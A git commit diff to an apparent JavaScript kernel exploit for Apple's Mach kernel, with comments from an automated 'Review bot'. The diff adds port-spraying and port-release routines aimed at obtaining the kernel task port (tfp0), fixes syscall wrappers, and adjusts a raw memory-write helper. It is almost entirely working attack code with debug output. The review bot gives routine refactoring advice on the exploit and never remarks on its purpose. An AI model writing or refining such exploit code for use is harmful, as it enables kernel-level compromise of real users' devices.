Diffstat (limited to 'src')
| -rwxr-xr-x | src/js/kexp/exploit.js | 60 | ||||
| -rwxr-xr-x | src/js/lib/myutils.js | 4 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 2 |
3 files changed, 53 insertions, 13 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index e0ef574..22f68ca 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -26,8 +26,10 @@ var req_head_msgh_reply_port = 0xc;
 var req_head_msgh_id = 0x14;
 var req_msgh_body_msgh_descriptor_count = 0x18;
 var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
-var req_init_port_set_address = 0x0
-var req_init_port_set_count = 0x4
+var req_init_port_set_address = 0x0;
+var req_init_port_set_count = 0x4;
+var MACH_RCV_MSG = 0x2;
+var MACH_MSG_TIMEOUT_NONE = 0;
 var task_self = 0;
 var kslide = 0;
@@ -181,7 +183,7 @@ function spray(dict, size, port) {
 var kp = 0;
 function spray_ports(number_port_descs) {
- printf("spray_ports %d\n", number_port_descs);
+// printf("spray_ports %d\n", number_port_descs);
 if (kp == 0) {
 kp = malloc(4);
 mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
@@ -191,11 +193,12 @@ function spray_ports(number_port_descs) {
 var mp = malloc(4);
 mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
- var rmp = read_u32(mp);
- mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
- send_ports(rmp, read_u32(kp), 2, number_port_descs);
- return mp;
+ send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ var ret = read_u32(mp);
+ free(mp);
+ return ret;
 }
 function fast_log2(n) {
@@ -242,8 +245,10 @@ function send_ports(target, payload, num, number_port_descs) {
 new_buf_.push(tmp[3]);
 new_buf_.push(0);
 new_buf_.push(0);
- new_buf_.push(19);
 new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+ new_buf_.push(19);
+
+// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]);
 var new_buf = fast_array_mul(new_buf_, number_port_descs);
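Review bot: The `printf("spray_ports %d\n", number_port_descs);` at the top of spray_ports is commented out rather than deleted, and the send_ports hunk further down does the same with `// printf("%x 0x%08x,...`, a line that would not even parse if re-enabled (`new_buf_[zz]]`, and `zz` is defined nowhere in view). Commented-out debug statements are dead text that version control already preserves, and a toggle-by-comment is easy to leave in the wrong state; remove both lines. If a trace at spray time is genuinely wanted, keep a single call gated by a debug flag rather than an editable comment.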
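Review bot: After dropping the `rmp` local, spray_ports now calls `read_u32(mp)` three times for the same word (twice as arguments to mach_port_insert_right, once for send_ports) and a fourth time into `ret`. Read it once into a local right after mach_port_allocate, `var name = read_u32(mp);`, and pass `name` to both calls and return it after `free(mp)`; that is shorter, avoids repeated reads of the same memory, and makes the returned value obviously the same one that was registered. The spray_ports body is split across the two hunks here, so the first read site is in the hunk above.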
@@ -267,11 +272,27 @@ function send_ports(target, payload, num, number_port_descs) {
 free(buf);
- printf("%d %s\n", ret, mach_error_string(ret));
- return ret;
 }
+function release_port_ptrs(port) {
+ printf("alive\n");
+ var req = malloc(0x1c + (5 * 0xc) + 0x8);
+ for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) {
+ write_u32(req + i, 0x0);
+ }
+ printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+ printf("alive\n");
+ var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ printf("alive\n");
+ // if (ret != KERN_SUCCESS) {
+ printf("mach_recv %d %s\n", ret, mach_error_string(ret));
+ printf("alive\n");
+ // }
+ free(req);
+ printf("alive\n");
+}
+
 function get_kernel_task() {
 var ret = 0;
 var tfp0 = 0;
@@ -318,17 +339,36 @@ function get_kernel_task() {
 prepare_ptr(big_buf, big_size, kptr, 256);
 prepare_ptr(small_buf, small_size, kptr, 32);
+ sched_yield();
 for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
 var dummy = malloc(4);
 spray(big_buf, big_size, dummy);
 }
+ sched_yield();
 for (var i = 0; i < PORTS_NUM; i++) {
 write_u32(fp + (i << 2), spray_ports(i));
 var dummy = malloc(4);
 spray(small_buf, small_size, dummy);
 }
+ sched_yield();
+ for (var i = 0; i < PORTS_NUM; i++) {
+ printf("test\n");
+ printf("test1\n");
+ printf("test2\n");
+ printf("test3\n");
+ printf("test4\n");
+ printf("test5\n");
+ printf("test6\n");
+ printf("test7\n");
+ printf("test8\n");
+ printf("test9\n");
+ printf("test10\n");
+ release_port_ptrs(read_u32(fp + (i << 2)));
+ printf("test11\n");
+ }
+ printf("get lucky\n");
 return tfp0;
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 325c490..e856624 100755
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
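Review bot: release_port_ptrs is mostly step-tracing: five `printf("alive\n")` calls, a hexdump of a buffer the loop just zeroed (so it can only print zeros), a commented-out `if (ret != KERN_SUCCESS)` guard around the status print, and the size `0x1c + (5 * 0xc) + 0x8` spelled out three times; the get_kernel_task hunk below wraps its one call in twelve `printf("test…\n")` lines in the same way. These will drown whatever the tool actually needs to report and should be removed before merging, with the size hoisted into a single local, `var req_size = 0x1c + (5 * 0xc) + 0x8;`, and the guard either restored or deleted rather than left as a comment. The new function also has no header comment; a one-liner stating what `port` is expected to be and what the function does with the received message would let a reader follow it without reverse-engineering the buffer layout. The `// }` pairing of the disabled guard is easy to miss when re-enabling, which is one more reason not to keep it in comment form.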
@@ -95,8 +95,8 @@ var strlen = scall_wrapper("strlen");
 var mach_task_self = scall_wrapper("mach_task_self");
 var mach_thread_self = scall_wrapper("mach_thread_self");
 var malloc = scall_wrapper("malloc");
-var mach_port_allocate = scall_wrapper("malloc");
-var mach_port_insert_right = scall_wrapper("malloc");
+var mach_port_allocate = scall_wrapper("mach_port_allocate");
+var mach_port_insert_right = scall_wrapper("mach_port_insert_right");
 var mach_port_set_attributes = scall_wrapper("mach_port_set_attributes");
 var usleep = scall_wrapper("usleep");
 var sched_yield = scall_wrapper("sched_yield");
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index ff12fdd..f6c4fe7 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -92,7 +92,7 @@ function write_u32_buf(addy, buf, len) {
 }
 function fast_write_buf(addy, buf) {
- var upper_i = Math.floor(buf.length / 0x100);
+ var upper_i = Math.ceil(buf.length / 0x100);
 for (var i = 0; i < upper_i; i++) {
 u8x4 = u32_to_u8x4(addy + (i * 0x100));
|
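Review bot: `u8x4 = u32_to_u8x4(addy + (i * 0x100));` in fast_write_buf assigns an identifier that is never declared, so it becomes an implicit global shared by every caller of this helper; declare it locally, `var u8x4 = u32_to_u8x4(addy + (i * 0x100));`. Separately, changing `Math.floor` to `Math.ceil` means the last iteration now covers a partial 0x100-element chunk; the loop body runs past the end of the hunk, so confirm it bounds that final chunk by `buf.length - i * 0x100` rather than a fixed 0x100, otherwise it will index past the end of `buf` and pick up `undefined` entries on the last pass. fast_write_buf's body and closing brace are outside this hunk.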
